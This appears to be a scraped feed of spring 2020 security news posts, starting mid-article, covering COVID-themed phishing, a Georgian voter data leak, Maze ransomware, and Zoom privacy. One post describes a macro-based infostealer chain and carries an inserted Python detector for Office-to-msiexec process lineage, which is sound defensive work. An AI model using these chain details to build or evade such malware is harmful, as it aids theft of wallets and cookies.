“When we have done exercises in the past for pandemic preparedness, supply chain issues were a well-documented challenge”, commented Saskia Popescu, an epidemiologist focused on hospital preparedness, for Vox.com. “This is something we’ve known about — maybe not to this extent, but this isn’t a shocker. It’s more surprising that we let it get this bad.”

Knowing that disaster could strike anytime is not to be neglected.

In a similar fashion, the same reasoning applies to an organization’s cybersecurity. Knowing that cyber-attacks and data breaches could be lurking around the corner, would you not want to protect your digital assets in the best possible way?

Through proactive security measures, such as staying on top of your patching or scanning your organization’s incoming and outgoing traffic through DNS filtering, and reactive defenses, like using a next-gen Antivirus and then extending your defenses to email security and privileged access rights management, your organization can achieve true cyber resilience.

What organizations can learn from a cybersecurity standpoint

First of all, security leaders should accept that any organization is exposed to cyber threats. After all, it’s a matter of when (not if).

Secondly, another vital step refers to testing (or in other words, gaining visibility inside your organization). This is how you can understand exactly if or which parts of your business are being affected and in case of an existing infection, be able to address it correctly. As I’ve mentioned before, micro-segmentation is recommended. Dividing your network into different security segments with fine-grained security controls will help you isolate different areas and limit the spread of a potential infection.

Last, but not least, organizations should operate with a prevention-first mindset and combine proactive and reactive protection measures. Prevention still is the best cure, after all.


Bottom Line

In today’s unprecedented context, how long the COVID-19 pandemic will last is still uncertain. However, what is clear is that it has raised highly complex issues and revealed serious flaws in crisis management in multiple countries around the world. The outbreak only shows that we are completely unprepared to deal with it. However, it’s (probably) not too late to act now, remain optimistic, and prevent future outbreaks.

The post Decision Making Before and During Times of Crisis: A Parallel Between Cybersecurity Incidents and the Current COVID-19 Pandemic appeared first on Heimdal Security Blog.

Carnegie Mellon Launches Cybersecurity Master’s Degree

Carnegie Mellon University (CMU) has launched a cybersecurity-focused master's degree program. 

The new program centers on building expertise in risk management, information security, and data privacy and aims to develop key skills in operations, strategy, and analysis. 

To earn their master's degree, student teams will have to solve real security problems for a national capital area–based organization or government agency.

Instead of being created as a standalone course, the new program will exist as a security-focused track within CMU's established Master of Science in Information Technology (MSIT) program, taught at Heinz College of Information Systems and Public Policy in Washington, DC.

The MSIT: Information Security and Assurance (Cybersecurity-DC) program will be taught by leading security practitioners and researchers and experts from the CERT Division of CMU’s Software Engineering Institute (SEI). 

Among the instructors already lined up for the program is retired Brigadier General Gregory J. Touhill, appointed by President Barack Obama as the first federal CISO of the United States government and currently serving as AppGate Federal Group's president.

"Cybersecurity-DC will create a robust pipeline of highly skilled mission-ready security professionals where it’s needed most—in the heart of the National Capital area region," said Touhill. "Federal agencies and private companies need creative leaders with the blend of skills we teach to better manage risk while defending their organizations and stakeholders against emerging threats."

The program will be delivered in a hybrid format that will see students complete the majority of coursework online. However, some in-person group sessions, seminars, and exams will take place at Heinz College’s DC campus. 

"During these sessions, cohort members will have the opportunity to develop a tight-knit community and create lasting peer networks," said a spokesperson for CMU.

“We’re excited to offer this program, which is unique in the field,” said Andy Wasser, associate dean at Heinz College. 

“Cybersecurity-DC brings together professionals to collaborate and form close bonds with their cohort. It effectively combines the convenience of online learning with our ethos of experiential learning and practical experience, which is crucial to success in the security context.”

The new program will commence in August 2020.

Remote work and web conferencing: Security and privacy considerations

As more and more people remain at home and work from home due to the COVID-19 pandemic, most of them have been forced to use one or many video and audio conferencing applications out of necessity. For the same reason, many companies have had to quickly introduce these new tools to their employees, all the while hoping the benefits will outweigh the risks until they have had the chance to introduce protections, policies and more …

The post Remote work and web conferencing: Security and privacy considerations appeared first on Help Net Security.

Messing With Web Attackers With SpiderTrap (Cyber Deception)

Hello and welcome! My name is John Strand. In this video, we’re going to be talking about using SpiderTrap to entrap and ensnare any web application pentesters or hackers that are trying to come into your web applications. Now, for this particular video, we’re going to be using the Active Defense Harbinger Distribution, or ADHD, […]

The post Messing With Web Attackers With SpiderTrap (Cyber Deception) appeared first on Black Hills Information Security.

Google sent ~40K warnings to targets of state-backed attackers in 2019

Google has seen a rising number of attackers impersonating news outlets and journalists to spread fake news among other reporters.

Voter information for 4,934,863 Georgians leaked online

Voter information for 4,934,863 Georgians has been published on a hacker forum over the weekend.

According to the data breach notification service Under the Breach, on Saturday a file containing voter information for more than 4.9 million Georgians, including deceased citizens, was published on a hacking forum.

Georgia has 3.7 million citizens, but the voting population is around one third.

The data was contained in a 1.04 GB Microsoft Access database file.

Exposed personal information includes full names, home addresses, dates of birth, ID numbers, and mobile phone numbers.

Under the Breach shared the database with the online media outlet ZDNet that analyzed it and confirmed the presence of 4,934,863 records, many of them belonging to deceased voters.

“The database contained 4,934,863 records but was not kept up to date, as it also included details for millions of deceased voters — as can be seen from the screenshot below.” reads the post published by ZDNet.

The user who published the file on the hacker forum claims it originated from the official government portal voters.cec.gov.ge, the government service that allows voters to verify and update their registration records.

At this time it is not clear how the user who published the data obtained it.

Similar incidents have occurred in the past: in September, experts discovered a huge data leak affecting Ecuador, perhaps the largest full-country leak, which exposed data belonging to 20 million Ecuadorian citizens.

In August 2019, voter information of more than 14.3 million Chileans, which accounts for nearly 80% of the population, was exposed on the internet due to an unsecured Elasticsearch database.

Pierluigi Paganini

(SecurityAffairs – Georgians voters, hacking)

The post Voter information for 4,934,863 Georgians leaked online appeared first on Security Affairs.

AppTrana Offers Protection to Online Businesses During Coronavirus Outbreak

These are unprecedented times, and everyone is going through a testing period, with more than 3 billion people locked down all over the world. Businesses are scrambling to stay afloat and are forced to move digital in a very short span of time without much preparation. As these businesses move digital, cyber threats are more real than ever. Every day we are hearing news about hackers taking

Privacy vs. Surveillance in the Age of COVID-19

The trade-offs are changing:

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus, even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale.

Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later.

I think the effects of COVID-19 will be more drastic than the effects of the terrorist attacks of 9/11: not only with respect to surveillance, but across many aspects of our society. And while many things that would never be acceptable during normal times are reasonable things to do right now, we need to make sure we can ratchet them back once the current pandemic is over.

Cindy Cohn at EFF wrote:

We know that this virus requires us to take steps that would be unthinkable in normal times. Staying inside, limiting public gatherings, and cooperating with medically needed attempts to track the virus are, when approached properly, reasonable and responsible things to do. But we must be as vigilant as we are thoughtful. We must be sure that measures taken in the name of responding to COVID-19 are, in the language of international human rights law, "necessary and proportionate" to the needs of society in fighting the virus. Above all, we must make sure that these measures end and that the data collected for these purposes is not re-purposed for either governmental or commercial ends.

I worry that in our haste and fear, we will fail to do any of that.

More from EFF.

#COVID19 Phishing Scam Tricks People With ‘You Might Be Infected’ Warning

Security awareness training and simulated phishing provider KnowBe4 has announced that it has discovered a new type of phishing scam warning people that they’ve come into contact with a friend/colleague/family member who has been infected with the coronavirus and so are at risk of being infected themselves.

The email, which is crafted to appear as though it has come from a legitimate hospital, instructs users to download a malicious attachment and proceed immediately to the hospital.

The attachment contains hidden malware, KnowBe4 explained, with a number of advanced functions that allow it to evade detection by security applications, worm its way deep into an infected system and serve as a platform for a variety of criminal activities.

“This is a new type of malware that we’re seeing, as it was reported for the first time just a few days ago,” said Eric Howes, principal lab researcher, KnowBe4. “For the bad guys, this is a target-rich environment that preys on end-users’ fears and heightened emotions during this pandemic. Employees need to be extra cautious when it comes to any emails related to COVID-19 and they need to be trained and educated to expect them, accurately identify them and handle them safely.”

The latest discovery is yet another example of how cyber-criminals are seeking to exploit people through phishing emails during the COVID-19 pandemic.

RDP and VPN use soars, increasing enterprise cyber risk

As COVID-19 slowly spread across the globe, consumer demand for commercial virtual private network (VPN) services has soared – both for security reasons and for bypassing geo-blocking of (streaming) content. Not unexpectedly, enterprise VPN use has also greatly increased, and so has the use of the Remote Desktop Protocol (RDP), a popular and common means for remotely managing a computer over a network connection. Increased enterprise RDP and VPN use Shodan creator John Matherly has …

The post RDP and VPN use soars, increasing enterprise cyber risk appeared first on Help Net Security.

Zoom Stops Transferring Data by Default to Facebook

Privacy Gaffe Blamed on Facebook's iOS Software Development Kit
Zoom has apologized for sharing large sets of user data by default with Facebook, blaming the social network's software development kit, which it has removed from its iOS app. With COVID-19 driving unprecedented levels of remote working, video conferencing software is under the privacy and security microscope.

Government Launches Response Unit to Fight #COVID19 Fake News

The British government has launched a new rapid response unit to coordinate the fight against online misinformation about COVID-19.

Reports suggest that the unit, operating from within the Cabinet Office and Number 10, will help to deal with “false and misleading narratives about coronavirus.” These will include everything from phishing scams to fake ‘experts’ issuing false medical advice.

Culture secretary, Oliver Dowden, has claimed that fake news could cost lives.

“We need people to follow expert medical advice and stay at home, protect the NHS and save lives,” he’s quoted by the BBC as saying. “It is vital that this message hits home and that misinformation and disinformation which undermines it is knocked down quickly.”

As part of these efforts, the government is relaunching a campaign on misinformation called “Don’t Feed the Beast.”

Most social media companies have said they will work with governments to try and halt the spread of rumors online.

Earlier this month, Twitter said it was broadening its definition of online harm to include content that contradicts guidance from public health and other trusted bodies. However, it also admitted that increasing its reliance on automated systems may result in more mistakes as they lack the context that human moderators can bring.

Also earlier in March, the UK’s National Cyber Security Centre (NCSC) said it was removing malicious and phishing websites linked to the pandemic, as businesses and consumers continue to be exposed to credential theft, identity fraud, ransomware and more.

The National Crime Agency also last week released information for individuals and businesses on how to stay safe from fraud and other scams.

It’s claimed the new government rapid response unit is dealing with around 70 incidents of misinformation each week.

COVID-19: Hackers Begin Exploiting Zoom’s Overnight Success to Spread Malware

As people increasingly work from home and online communication platforms such as Zoom explode in popularity in the wake of coronavirus outbreak, cybercriminals are taking advantage of the spike in usage by registering new fake "Zoom" domains and malicious "Zoom" executable files in an attempt to trick people into downloading malware on their devices. According to a report published by Check

Overcoming security complexity

There isn’t a country in the world in which security, and the threat of being hacked, isn’t an ongoing issue. However, Canadians, in particular, must take more preventative measures because they’re not faring well at all. The LifeLabs breach of late 2019 saw the medical records of 15 million Ontario and BC residents stolen. An…

Maze Authors Claim to Have Hit Insurer Chubb

A leading insurance provider appears to have been targeted by a notorious ransomware group, which is threatening to release information stolen from the company if it doesn’t pay up.

Chubb Insurance, which offers cyber-policies as well as other types of protection, has become the latest company singled out by the Maze group.

Once organizations have been infected with Maze ransomware the group lists them on its dedicated ‘News’ site, which Infosecurity won't link to, where they are given notice that stolen records will be published unless the ransom is paid.

It’s a relatively new but increasingly popular tactic used by ransomware gangs to force payment even if the victim organization has backups.

The group claimed on its site that Chubb was “locked” at some point in March. It included the emails of the firm’s CEO, COO and vice-chairman as ‘evidence’ of its intent, although the insurer has claimed its systems remain untouched.

"We are currently investigating a computer security incident that may involve unauthorized access to data held by a third-party service provider. We are working with law enforcement and a leading cybersecurity firm as part of our investigation,” it said in a statement.

“We have no evidence that the incident affected Chubb’s network. Our network remains fully operational and we continue to service all policyholder needs, including claims. Securing the data entrusted to Chubb is a top priority for us. We will provide further information as appropriate.”

That said, security researchers have discovered unpatched vulnerabilities at the firm which could theoretically have provided a route to ransomware infection.

Bad Packets Report claimed last week to have found five exposed Citrix Netscaler servers, after scanning for the CVE-2019-19781 vulnerability.

The flaw in Citrix Application Delivery Controller (ADC) and Citrix Gateway could allow an unauthenticated attacker to perform arbitrary code execution. It’s already been linked to multiple ransomware attacks including one on a German car parts manufacturer.

Global E-Commerce Fraud to Top $25bn by 2024

Global online payment fraud losses are set to soar by more than 50% over the coming four years to exceed $25bn per year, according to a new report from Juniper Research.

The market analyst’s report, Online Payment Fraud: Emerging Threats, Segment Analysis & Market Forecasts 2020-2024, predicted a 52% growth in merchant losses to scams over the period.

The growing popularity of online shopping combined with the enhanced security of card-present transactions through the EMV initiative is helping to drive much more fraud into e-commerce, the analyst claimed.

This is despite the launch of Secure Customer Authentication (SCA) checks in Europe, although this initiative has been delayed several times. The new rules, part of the EU’s PSD2 banking regulation, will now come into force by December 31 2020 in Europe and March 2021 in the UK.

They mandate that certain transactions be subject to two-factor authentication in order to help lock fraudsters out. However, there are concerns that SCA might also create extra user friction which puts consumers off.

Juniper Research urged merchants to work closely with security vendors to design and implement extra authentication checks in shopping apps that minimize friction.

It also argued that e-commerce providers must take a more educational role, providing information to customers on the need for improved cybersecurity and changes to checkout processes, as well as details on some of the most popular scams.

The analyst claimed this was particularly important in China, which it said will account for 42% of e-commerce fraud by 2024.

“The explosion of e-commerce means that fraudsters have evolved their tactics, and so merchants must also evolve,” argued report co-author, Nick Maynard.

“E-commerce merchants must educate their users in anti-fraud best practice, as the human element is consistently the most vulnerable to exploitation in the online payments ecosystem.”

Your colleague was infected with Coronavirus, this is the latest phishing lure

Security experts uncovered a new Coronavirus-themed phishing campaign in which the messages inform recipients that they have been exposed to the virus.

Experts continue to spot Coronavirus-themed attacks. A new phishing campaign uses messages that pretend to come from a local hospital, informing victims that they have been exposed to the virus and urgently need to be tested.

Threat actors attempt to take advantage of the population’s fear of being infected with COVID-19, which is killing hundreds of thousands of people worldwide.

The phishing messages tell the victims that one of their colleagues, friends, or family members has tested positive for the virus, and urge them to print the attached “EmergencyContact.xlsm” file and bring it with them to the nearest testing center.

Upon opening the file, victims are asked to click ‘Enable Content’ to view the protected document, but doing so triggers the infection process.

“If a user enables content, malicious macros will be executed to download a malware executable to the computer and launch it.” reads the post published by BleepingComputer.

The malicious executable then injects into multiple instances of the legitimate Windows msiexec.exe process to evade detection by security solutions.

The malicious code analyzed by BleepingComputer researchers is an information stealer that attempts to steal cryptocurrency wallets and web browser cookies.

The malicious code also collects a list of programs running on the computer, looks for open shares on the network, and gathers the local IP address configuration of the machine.
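The chain described above (an Office document, a macro that downloads and launches an executable, and injection into msiexec.exe) leaves a recognisable process lineage in endpoint telemetry. What follows is an added example, not code from the original post or from BleepingComputer: a small Python detector that walks constructed process-creation records (pid, parent pid, image path, in the shape of a Sysmon Event ID 1 log) and flags three things a defender would want to see: an Office application spawning an unexpected child, an msiexec.exe whose ancestry leads back to an Office application, and one non-installer parent starting several msiexec.exe instances. The pids, the image name update.exe, the allowlists and the sample events are all constructed assumptions to be tuned per environment.

```python
"""Added example: flag the Office -> dropper -> msiexec.exe lineage in process telemetry."""
import ntpath
from collections import defaultdict
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Children that Office apps legitimately start (assumption: tune to your environment).
OFFICE_CHILD_ALLOWLIST = {"splwow64.exe", "dw20.exe"}
# Parents from which several msiexec.exe instances are normal (Windows Installer service).
EXPECTED_MSIEXEC_PARENTS = {"services.exe", "msiexec.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str  # full image path as logged (Sysmon Event ID 1 "Image" field)


def basename(image: str) -> str:
    """Case-insensitive file name of a Windows image path."""
    return ntpath.basename(image).lower()


def analyze(events):
    """Return a list of (rule_name, pid) findings for a batch of process-creation events.

    Assumes pids are unique within the batch; on a real host, pid reuse means the
    lineage should be keyed on a process GUID rather than the bare pid."""
    by_pid = {e.pid: e for e in events}
    findings = []

    def office_ancestor(e):
        """Walk the parent chain and return the first Office ancestor, if any."""
        seen = set()
        cur = by_pid.get(e.ppid)
        while cur is not None and cur.pid not in seen:
            seen.add(cur.pid)
            if basename(cur.image) in OFFICE_APPS:
                return cur
            cur = by_pid.get(cur.ppid)
        return None

    msiexec_by_parent = defaultdict(list)
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Rule 1: an Office app launching something it normally would not (macro dropper).
        if pname in OFFICE_APPS and name not in OFFICE_CHILD_ALLOWLIST:
            findings.append(("office_spawned_executable", e.pid))
        # Rule 2: msiexec.exe whose lineage leads back to an Office document.
        if name == "msiexec.exe":
            msiexec_by_parent[e.ppid].append(e.pid)
            if office_ancestor(e) is not None:
                findings.append(("msiexec_with_office_ancestor", e.pid))
    # Rule 3: one non-installer parent launching several msiexec.exe instances.
    for ppid, pids in msiexec_by_parent.items():
        parent = by_pid.get(ppid)
        pname = basename(parent.image) if parent else ""
        if len(pids) >= 2 and pname not in EXPECTED_MSIEXEC_PARENTS:
            findings.append(("multiple_msiexec_from_one_parent", ppid))
    return findings


# Constructed sample batch: a benign installer run next to the phishing chain.
SAMPLE_EVENTS = [
    ProcessEvent(100, 4, r"C:\Windows\explorer.exe"),
    ProcessEvent(700, 4, r"C:\Windows\System32\services.exe"),
    ProcessEvent(500, 700, r"C:\Windows\System32\msiexec.exe"),   # benign: Windows Installer service
    ProcessEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    ProcessEvent(300, 200, r"C:\Users\user\AppData\Local\Temp\update.exe"),  # constructed dropper name
    ProcessEvent(400, 300, r"C:\Windows\System32\msiexec.exe"),
    ProcessEvent(401, 300, r"C:\Windows\System32\msiexec.exe"),
    ProcessEvent(402, 300, r"C:\Windows\System32\msiexec.exe"),
]


def demo():
    """Run the detector over the constructed batch."""
    return analyze(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, pid in demo():
        print(f"{rule}: pid {pid}")
```

The benign msiexec.exe launched by services.exe produces no finding, while the three instances under the Office-spawned executable trip both the lineage rule and the count rule; in production the same logic belongs in the SIEM or EDR query language, keyed on process GUIDs rather than pids.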

Unfortunately, this is only one of the numerous Coronavirus-themed attacks recently observed by security researchers; below is the list of the attacks observed in the last seven days.

Pierluigi Paganini

(SecurityAffairs – phishing, coronavirus)

The post Your colleague was infected with Coronavirus, this is the latest phishing lure appeared first on Security Affairs.

COVID-19 Scam Roundup – Week of 3/23/20

Many in the digital security community are coming together to combat malicious actors during the coronavirus disease 2019 (COVID-19) global outbreak. One of the most visible of these new efforts is the COVID-19 CTI League. Made up of approximately 400 volunteers living in approximately 40 countries, the COVID-19 CTI League is working to block attackers […]

The post COVID-19 Scam Roundup – Week of 3/23/20 appeared first on The State of Security.

Mr and Mrs CISO: Security in the Age of the Lockdown

With so many of us frantically learning to juggle our roles as parents, workers and most recently teachers; is it just my wife and I who feel it necessary to monitor the online activity of our teenagers during this lockdown? Sure, there’s rich educational content out there, but it sits amongst social networks, streaming services, […]

The post Mr and Mrs CISO: Security in the Age of the Lockdown appeared first on The State of Security.